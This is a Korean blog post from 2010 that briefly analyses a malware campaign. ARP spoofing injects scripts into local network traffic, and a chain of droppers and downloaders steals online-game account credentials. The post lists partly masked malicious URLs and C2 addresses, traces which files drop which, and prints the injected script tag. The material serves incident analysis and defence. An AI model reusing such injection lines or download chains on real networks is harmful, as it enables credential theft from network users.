온라인게임 계정 탈취와 ARP Spoofing 공격에 대한 로그 및 간략분석

반응형
(사진 출처 : http://blog.naver.com/sheistong/140110741858)

기록용으로 남긴다.

2010-09-03일 처음으로 ARP Spoofing 관련 내용을 접하였고, 주말을 통해 전파속도가 급속히 늘어났다.

현재까지 발견 된 스크립트는 다음과 같다.
- 9월 3일 변조 된 국내외 홈페이지에서 발견 된 스크립트 형태
http://www.xzjiay***.com/ad/yahoo.js
http://www.xzjiay***.com/ad/ad.htm
http://www.xzjiay***.com/ad/news.html
http://www.xzjiay***.com/ad/count1.html
http://www.dadi***.com/images/s.exe

- 9월 6일 변형 된 스크립트 형태
http://www.fal***.com/js/yahoo.js
http://www.fal***.com/js/ad.htm
http://www.fal***.com/js/news.html
http://www.fal***.com/js/count.html
http://www.exi***.com/images/s.exe

현재 9월 6일에 발견 된 URL은 아직도 접속 및 다운로드가 가능하다.
키사에서는 모하는건지 ㅡ.ㅡ;; 후딱 좀 블럭처리좀 해주시지!!

어디서 자꾸 변종파일들이 들어온다 ㅡ.ㅡ;;
이번에 문제가 되는 악성코드 세트이다. 나열된 순서가 악성코드가 시작되는 순서이다.
- 파일분석(s.exe, V.DWN.Onlinegame.PA.Gen)
s.exe 파일은 다음 파일을 생성시킨다.
C:\Documents and Settings\<UserName>\Microsoft\smx4pnp.dll

- 파일분석(smx4pnp.dll, V.DWN.Onlinegame.PA.Gen)
특정서버에 접속하여 파일을 다운로드 한다.
http://202.109.***.**:81/s.txt
http://202.109.***.**:81/ma.exe
http://202.109.***.**:81/tt.exe

http://98.126.**.***:81/s.txt
http://98.126.**.***:81/ma.exe
http://98.126.**.***:81/tt.exe

- 파일분석(ma.exe, V.DRP.OnlineGames.kv)
ma.exe 파일은 다음 파일을 생성시킨다.
C:\WINDOWS\system32\xcvaver0.dll

- 파일분석(xcvaver0.dll, S.SPY.OnlineGames.kv)
국내 온라인 게임의 아이디 및 패스워드를 가로채며, 특정 보안제품의 동작을 방해한다.
대상은 메이폴스토리, 던전앤파이터,플레이엔씨 등이 있다.

- 파일분석(tt.exe, V.TRJ.ARPSpoofing.faloge)
tt.exe 파일은 다음 파일을 생성시킨다.
C:\WINDOWS\system32\nvsvc.exe

- 파일분석(nvsvc.exe, V.TRJ.ARPSpoofing.faloge)
자신이 동작 된 PC의  IP를 확인하여 C클래스 xx.xx.xx.1 ~ 255 까지 순차적으로 ARP Spoofing 공격을 실행하여 같은 네트워크단에 있는 PC가 인터넷 사용시 다음 스크립트를 삽입시킨다.
<script src=http://www.fal***.com/js/yahoo.js></script>




댓글(2)

Designed by JB FACTORY